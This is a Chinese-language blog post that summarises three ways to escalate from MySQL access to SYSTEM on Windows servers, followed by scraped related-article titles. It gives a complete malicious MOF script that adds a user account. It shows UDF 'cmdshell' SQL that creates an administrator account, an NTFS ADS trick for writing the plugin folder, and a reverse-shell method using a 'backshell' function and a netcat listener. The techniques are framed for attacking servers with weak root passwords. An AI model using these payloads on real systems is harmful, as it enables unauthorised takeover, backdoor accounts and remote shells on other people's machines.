mysql提权_mysql提权总结
一、mof提权
windows管理规范提供了以下三种方法编译到WMI存储库的托管对象格式(MOF)文件:
1、运行MOF文件指定为命令行参数讲Mofcomp.exe文件。
2、使用IMofCompiler接口和$CompileFile方法。
3、拖放到%SystemRoot%\System32\Wbem\MOF文件夹的MOF文件。
Micrsoft建议您到存储库编译MOF文件使用前两种方法。也就是运行Mofcomp.exe文件或使用IMofCompiler:CompileFile方法。
第三种方法仅为后兼容性与早期版本的WMI提供,并因为此功能可能不会提供在将来的版本。
具体到mysql提权中,我们该怎么利用?
1、找一个可写目录上传mof文件,这里我们上传到了C:/wmpub/nullevt.mof,代码如下:
其中第18行,上传前请自己更改。
1 #pragma namespace("\\\\.\\root\\subscription")
2
3 instance of __EventFilter as$EventFilter4 {5 EventNamespace = "Root\\Cimv2";6 Name = "filtP2";7 Query = "Select * From __InstanceModificationEvent"
8 "Where TargetInstance Isa \"Win32_LocalTime\""
9 "And TargetInstance.Second = 5";10 QueryLanguage = "WQL";11 };12
13 instance of ActiveScriptEventConsumer as$Consumer14 {15 Name = "consPCSV2";16 ScriptingEngine = "JScript";17 ScriptText =
18 "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")";19 };20
21 instance of __FilterToConsumerBinding22 {23 Consumer =$Consumer;24 Filter =$EventFilter;25 };
2、执行load_file及into dumpfile把文件导出到正确的位置即可。
1 select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
执行成功后,即可添加一个普通用户,然后可以更改命令,再上传导出执行把用户提升到管理员权限,然后3389连接就可以了。
二、利用UDF提权
功能:利用mysql自定义函数功能,将mysql的账号转化为system权限。
适用场景:1、目标系统是windows(win2000, XP,Win2003);2、拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限和抛弃函数。
3、首先判断mysql版本,如果大于5.1的话,就直接上传udf.dll到MySQL\Lib\Plugin\文件夹下,一般Lib、Plugin文件夹需要手工建立,mysql路径可以用select @@datadir语句找出。
4、直接执行create function sys_eval returns string soname 'udf.dll',若成功则可直接执行命令。
udf提权也是最常见的提权方式。但是往往再执行过程中老是遇到"Can't open shared library"的情况,这里可以利用NTFS ADS流来解决这个问题。
1、最常见的是直接使用udf.php此类的工具来执行udf提权。
连接mysql以后,先导出udf.dll到c:\windows\system32目录下。
2、创建相应的函数并执行命令,具体如下:
1 create function cmdshell returns string soname 'udf.dll';2 select cmdshell('net user waitalone waitalone.cn /add');3 select cmdshell('net localgroup administrators waitalone /add');4 drop functioncmdshell; 删除函数5 delete from mysql.func where name='cmdshell' 删除函数
3、某些情况下,我们会遇到Can't open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,但是默默情况下
plugin不存在,怎么办?还好有大牛研究出利用NTFS ADS流来创建文件夹的方法:
select @@basedir;//查找到mysql的目录select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';//利用NTFS ADS创建lib目录select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';//利用NTFS ADS创建plugin目录
执行成功以后再进行导出即可。
三、反弹端口连接提权
假设我们扫到一个mysql的root弱密码,并且可以外连,但是服务器上面的网站又无法getshell,这时我们怎么办?
1、利用mysql客户端工具连接mysql服务器,然后执行下面的操作。(mysql.txt暂时没有)
mysql.exe -h 172.16.10.11 -uroot -p
Enter password:
mysql> \. c:\mysql.txt
mysql>select backshell("YourIP",2010);
2、本地监听你反弹的端口
nc.exe -vv -l -p 2010
成功后,你将获得一个system权限的cmdshell,其实这个也是利用UFDF提权。
mysql提权_mysql提权总结相关推荐
- mysql mof提权_MySQL提权之mof提权
mof提权原理 关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次 ...
- 护卫神mysql无法启动_MySQL降权:MySQL以Guests帐户启动设置方法_护卫神
注意:本文章由护卫神原创,转载请注名出处. MySQL安装到Windows上,默认是以SYSTEM权限运行,该权限为系统最高权限,十分危险(安装的护卫神·PHP套件配置的环境除外).如下图: SYST ...
- mysql 赋权_Mysql赋权
MySQL 赋予用户权限命令的简单格式可概括为:grant 权限 on 数据库对象 to 用户 (授权后记得刷新权限:flush privileges;) 一.grant 普通数据用户,查询.插入.更 ...
- mysql反弹提权_MySQL数据库反弹端口连接提权
[51CTO.com原创稿件]在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令.在一般的情况下,也就放弃了.但其实可以 ...
- 利用mysql的几种提权方式
利用mysql的几种提权方式 mof提权 1.原理 在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以sy ...
- mysql mof提权原理_(新安全原创精华)Mysql扩展文件MOF提权详讲
本帖最后由 阿甫哥哥 于 2016-8-8 17:24 编辑 哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了. 希望大家可以支持我们,我们也会做得更好.无论是 ...
- shell将报错信息写到mysql_利用mysql的几种提权方式
利用mysql的几种提权方式 mof提权 1.原理 在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以sy ...
- 6-vulnhub靶场-LordOfTheRoot_1.0.1靶机内核提权udf提权缓冲区溢出提权
6-LordOfTheRoot_1.0.1 靶机地址 https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 难度 中等(主要是缓冲区溢出) 1 ...
- 《WEB安全渗透测试》(27)Linux系统提权-SUID提权
1.SUID提权介绍 提权,网络术语,指的是提高自己在服务器中的权限,如从普通用户提高到root用户,当网站被入侵后,攻击者会千方百计的去提高自己的权限,毕竟普通用户能干的事情太有限了. linux中 ...
最新文章
- Paramiko,数据库
- JZOJ 5371. 【NOIP2017提高A组模拟9.17】组合数问题
- Increasing Subsequence (easy version)
- php不缓存直接输出,如何在PHP中禁用输出缓冲
- 算法的时间复杂度和空间复杂度的原理
- 信息学奥赛一本通(1161:转进制)
- “变味”的扫码点餐 不获取个人信息不能吃饭
- 如何将爬虫获得的数据变为字典的key_Python爬虫第二战 爬取500px图片
- SqlHelper帮助类_上(SQLServer数据库含Connection详解)
- 埃氏筛法求质数(例如:200以内的质数)
- 083 conllections模块
- MacDev.GarbageCollectionIsDeprecated-WhenXcodeCompileMacAppProject
- 【细胞分割】基于matlab GUI原子力显微镜图像分析【含Matlab源码 1371期】
- java怎么改运行图标,java修改进程图标
- Android多开框架优化游戏防闪思路
- 修复关于DxO Nik Collection 2.0.8在Photoshop 2020不能显示中文问题
- 肖博高中高考数学答题技巧方法及常见问题
- md5是什么,md5的这些作用你都知道吗
- 从动物纪录片中所学所得
- 在 pygame 中好好玩玩精灵,滚雪球学 Python 游戏番
热门文章
- 大牛书单 | 数据库专题好书分享
- 腾讯研发效率领先的秘密:高效率的工具
- 浅析三种特殊进程:孤儿进程,僵尸进程和守护进程.
- 迁移上云方法论-6R
- leetcode 406. Queue Reconstruction by Height | 406. 根据身高重建队列(Java)
- leetcode 380. Insert Delete GetRandom O(1) | 380. O(1) 时间插入、删除和获取随机元素(Java)
- 牛客网_PAT乙级_10234有理数四则运算(20)【通过5/7:格式错误】
- 密码学系列之:memory-hard函数
- Spring5参考指南:基于Schema的AOP
- calendar类_带有时区的字符怎样转换为时间及Java 8中日期 与 Calendar 转换